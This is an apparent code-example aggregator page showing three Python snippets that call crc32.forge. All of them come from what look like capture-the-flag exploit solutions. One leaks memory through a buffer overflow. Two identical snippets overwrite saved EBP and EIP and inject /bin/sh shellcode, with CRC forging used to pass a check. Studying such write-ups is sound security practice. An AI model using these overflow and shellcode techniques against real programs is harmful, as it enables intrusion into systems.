Python forge Examples

Programming Language: Python

Namespace/Package Name: crc32

Method/Function: forge

Examples at hotexamples.com: 3

Python forge - 3 examples found. These are the top rated real world Python examples of crc32.forge extracted from open source projects. You can rate examples to help us improve the quality of examples.

Example #1

Show file

File: sol.py Project: jackpelf/store

def leak(str, addr, dest):	#leak qword	
	n = (dest - addr -8)/4 + 2
	print n
	res = ''
	for i in range(n):
		r.recvuntil('# ')
		r.send('1\n')
		r.recvuntil('How many dounts you want? ')
		r.send('x'*2040 + p64(addr) + 'aaaaaaaa\n')
		r.recvuntil('# ')
		r.send('3\n')
		r.recvuntil('Input your local system timestamp: ')
		r.send('aaa\n')
		r.recvuntil('Response: ')
		x = int(r.recvuntil('\n')[:-1], 16)
		x = crc32.forge(x, str, 8)[8:]
#		print hex(u32(x))
#		print b2a_hex(x)
		str = str[4:]+x
		res += x
		addr += 4
#		print 'str',b2a_hex(str)
#		print b2a_hex(res)
	return u64(res[-8:])

Example #2

Show file

File: win.py Project: 601040605/pwntools-write-ups

esp = 0xffffdc5c
sc  = cyclic(0x100)

# If we just let it crash by not patching out any values,
# we see that the register state looks like this:
#
# EBP: 0x61736161 (b'aasa')
# EIP: 0x61746161 (b'aata')
#
# Shellcode would be aftter that ('aaua')
sc = sc.replace('aasa', p32(esp + 0)) # EBP
sc = sc.replace('aata', p32(esp + 4)) # EIP

# Add in our '/bin/sh' shellcode
sc     = sc.replace('aaua', asm(shellcraft.sh()))
forged = forge(0xe1ca95ee, sc)

#
# Find out ESP with this, by setting a breakpoint on
# 080484EC and examining ESP.
#
# gdb = shell.run("bash r.sh gdb %s $'%s'" % (binary, forged))
# gdb.send("""
# set prompt
# break *0x080484EC
# run
# """)
# gdb.clean(2)
# gdb.sendline('printf "%p\\n",$sp')
# esp = gdb.recv().strip()
# log.info("ESP: %s" % esp)

Example #3

Show file

File: win.py Project: lotus321/Sec-Dump

esp = 0xffffdc5c
sc = cyclic(0x100)

# If we just let it crash by not patching out any values,
# we see that the register state looks like this:
#
# EBP: 0x61736161 (b'aasa')
# EIP: 0x61746161 (b'aata')
#
# Shellcode would be aftter that ('aaua')
sc = sc.replace('aasa', p32(esp + 0))  # EBP
sc = sc.replace('aata', p32(esp + 4))  # EIP

# Add in our '/bin/sh' shellcode
sc = sc.replace('aaua', asm(shellcraft.sh()))
forged = forge(0xe1ca95ee, sc)

#
# Find out ESP with this, by setting a breakpoint on
# 080484EC and examining ESP.
#
# gdb = shell.run("bash r.sh gdb %s $'%s'" % (binary, forged))
# gdb.send("""
# set prompt
# break *0x080484EC
# run
# """)
# gdb.clean(2)
# gdb.sendline('printf "%p\\n",$sp')
# esp = gdb.recv().strip()
# log.info("ESP: %s" % esp)